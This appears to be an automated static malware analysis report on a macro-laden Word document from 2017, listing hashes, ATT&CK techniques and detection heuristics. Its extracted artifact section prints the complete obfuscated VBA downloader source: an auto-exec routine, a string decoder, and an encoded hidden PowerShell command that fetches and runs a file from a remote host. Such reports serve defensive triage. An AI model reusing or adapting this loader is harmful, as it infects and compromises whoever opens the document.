Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5b3aa9a41ff1ec84…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 2017-06-22 03:58:00
Authoring application: Microsoft Office Word
First seen: 2017-07-07
MD5: ef0c67af7086afbce12e1b7d411cb57a
SHA-1: cce5f6cc13914275cbfa43f8f751989c6f8583aa
SHA-256: 5b3aa9a41ff1ec8497864b30f9f261f1766111d4332aad663245887aec397288
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample contains heavily obfuscated VBA macros, including the auto-executing Document_Open and Workbook_Open routines. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates a loader designed to execute code via 'CreateObject/Shell/exec'. The 'GetObject' and 'CallByName' calls are used together with obfuscated strings, most likely to construct and execute a malicious payload, which suggests downloader functionality.

Heuristics (10)

  • VBA macros detected (severity: medium; 7 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (severity: critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
        Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
        Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
  • GetObject call (severity: high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
        Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
        Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
  • CallByName call (severity: high) OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub Document_Open()
        CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
    End Sub
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
  • Workbook_Open macro (severity: low) OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Environ() call (env variable access) (severity: low) OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
        Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
        Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4071 bytes
SHA-256: dc471cabd54a845da9052c58ca5f64a594136a47c65a26910544488e16407521
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Public Sub Document_Open()
    CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Sub bZsQcEDQrdCtdkrr()
    Dim jSJWJoioisCWMvvKZZYnsRhPTdIGO As String
    jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
    Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
    Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)

    Dim tdFXHjZBrKkCTmaUFHgIektdGsKU As String
    Dim PyyNGYVivNqIlvHhGikEEBBV As Integer
    tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
    Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
    Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
    Dim fSiKBrpyeyLeIcHnC: Set fSiKBrpyeyLeIcHnC = CallByName(qPOmLxHndQYVOYya, CallByName(Me, "AJaqaMBlpXie", VbMethod, "65827389805B8085867380757771", 18), VbMethod)
    fSiKBrpyeyLeIcHnC.ShowWindow = 0
    Dim QTTXHDgZPtPgeiFbttQ: Set QTTXHDgZPtPgeiFbttQ = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F88444C697B8045447162848175778585", 18))
    CallByName QTTXHDgZPtPgeiFbttQ, CallByName(Me, "AJaqaMBlpXie", VbMethod, "558477738677", 18), VbMethod, jSJWJoioisCWMvvKZZYnsRhPTdIGO, Null, fSiKBrpyeyLeIcHnC, PyyNGYVivNqIlvHhGikEEBBV
End Sub

Public Function AJaqaMBlpXie(ByVal QTTXHDgZPtPgeiFbttQ As String, ByVal PyyNGYVivNqIlvHhGikEEBBV As Long) As String
    QTTXHDgZPtPgeiFbttQ = oEqwKBCToGBIXaUgUUyg(QTTXHDgZPtPgeiFbttQ)
    Dim i As Long
    AJaqaMBlpXie = Space$(Len(QTTXHDgZPtPgeiFbttQ))
    For i = 1& To Len(QTTXHDgZPtPgeiFbttQ)
        Mid$(AJaqaMBlpXie, i) = Chr$(Asc(Mid$(QTTXHDgZPtPgeiFbttQ, i, 1&)) - PyyNGYVivNqIlvHhGikEEBBV)
    Next
End Function

Private Function oEqwKBCToGBIXaUgUUyg(ByVal zVNooMbfnEmbGtgGFQ As String) As String
    Dim ZudxpXcEsCgjPwSPnTkQh As Integer
    Dim PAtMkYpKKhUxNiwyxrlhJCgvxFO As Integer
    Dim TMvaAfFCdDMdpHSYosI As String

    If Len(zVNooMbfnEmbGtgGFQ) = 0 Or Len(zVNooMbfnEmbGtgGFQ) Mod 2 <> 0 Then Exit Function
    ZudxpXcEsCgjPwSPnTkQh = Len(zVNooMbfnEmbGtgGFQ)
    For PAtMkYpKKhUxNiwyxrlhJCgvxFO = 1 To Len(zVNooMbfnEmbGtgGFQ)
      If PAtMkYpKKhUxNiwyxrlhJCgvxFO Mod 2 <> 0 Then
        TMvaAfFCdDMdpHSYosI = TMvaAfFCdDMdpHSYosI & Chr$(Val("&H" & Mid$(zVNooMbfnEmbGtgGFQ, PAtMkYpKKhUxNiwyxrlhJCgvxFO, 2)))
      End If
    Next
    oEqwKBCToGBIXaUgUUyg = TMvaAfFCdDMdpHSYosI
End Function